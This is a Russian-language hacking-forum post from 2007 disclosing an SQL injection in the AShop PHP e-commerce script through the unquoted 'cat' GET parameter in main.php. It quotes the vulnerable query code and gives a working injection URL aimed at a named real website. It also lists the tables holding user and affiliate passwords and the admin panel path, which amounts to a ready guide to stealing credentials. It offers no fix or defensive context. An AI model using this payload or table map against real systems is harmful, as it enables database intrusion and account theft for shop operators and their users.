SQL-injection в Ashop.

SQL-injection в Ashop.

07.09.2007, 04:07

[53x]Shadow

Leaders of Antichat

Регистрация: 25.01.2007

Сообщений: 341

С нами: 10153766

Репутация: 2565

SQL-injection в Ashop.

AShop - онлайн магазин с поддержкой партнерской программы с открытым кодом продается на плати.ру. (Не путать с ASHOP Software).

Возможна SQL-инъекция в параметре $cat в main.php.
Пример уязвимой части скрипта:

PHP код:


		
			
.......

// List categories...

    if ($cat) {

       $sql="SELECT parentcategoryid from category WHERE categoryid = $cat";

       $result = @mysql_query($sql,$db);

       $parent = @mysql_result($result, 0, "parentcategoryid");

    }

........

$cat не обрамляется кавычками, передается через GET параметры.

Пример использования уязвимости, правда на 3 мускуле:

Код:

http://muzplakat.ru/main.php?cat=6+/*!32358+and+0+*/

Таблицы: affiliate(user,password,mail) и user(user, password).
Админка: /admin/index.php

ЗЫ
Скрипт не особо распространен в сети =\
ЗЗЫ
Спасибо Alexsize, за предоставленные скрипты магаза =)

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось [53x]Shadow; 07.09.2007 в 11:35..